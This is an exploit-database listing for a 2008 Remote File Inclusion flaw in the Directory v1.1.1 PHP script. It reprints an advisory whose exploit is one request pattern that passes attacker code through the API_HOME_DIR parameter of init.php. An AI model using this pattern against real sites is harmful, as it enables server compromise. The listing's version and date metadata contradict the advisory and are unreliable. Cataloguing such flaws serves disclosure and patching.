header-logo
Suggest Exploit
vendor:
Directory
by:
Ghost Hacker
9.3
CVSS
HIGH
RFI
98
CWE
Product Name: Directory
Affected Version From: 1.1.2001
Affected Version To: 1.1.2001
Patch Exists: Yes
Related CWE: N/A
CPE: a:freedirectoryscript:directory
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Directory v1.1.1 (API_HOME_DIR) RFI Vulnerability

The Directory v1.1.1 script is vulnerable to a Remote File Inclusion (RFI) vulnerability. An attacker can exploit this vulnerability by sending a malicious URL in the API_HOME_DIR parameter of the init.php script.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of the Directory v1.1.1 script.
Source

Exploit-DB raw data:

####################################################################################################
# Directory v1.1.1 (API_HOME_DIR) RFI Vulnerablity                                                 #
# © Ghost Hacker , Real Hack Back :)                                                               #
####################################################################################################
#[~] Author : Ghost Hacker                                                                         #
#[~] Homepage : www.Real-h.com  [Real Hack Back]                                                   #
#[~] Contact Me : Ghost-r00t[at]Hotmail[dot]com                                                    #
#[~] Bug : RFI                                                                                     #
#[~] From : Kingdom Saudi Arabia                                                                   #
#[~] Name Script : Directory v1.1.1                                                                #
#[~] Download : http://www.freedirectoryscript.com/download/fds-v111-rc.zip                        #
####################################################################################################
#[~] Exploit :                                                                                     #
# init.php?API_HOME_DIR=Evil_Code                                                                  #
####################################################################################################
#[~]GreetZ :                                                                                       #
# Mr.SaFa7 , Mr-3sheq , aBo3tB , Night Mare , Root Hacker , Dmar al3noOoz                          #
# Mr.MN7oS , Mr.Hope , Scary.Hacker , Qabandi , v4-team.com                                        #
# All Members Real Hack , All My Friends :)                                                        #
####################################################################################################
# Viva Real Hack - Real-h.com ..                                                                   #
####################################################################################################

# milw0rm.com [2008-11-18]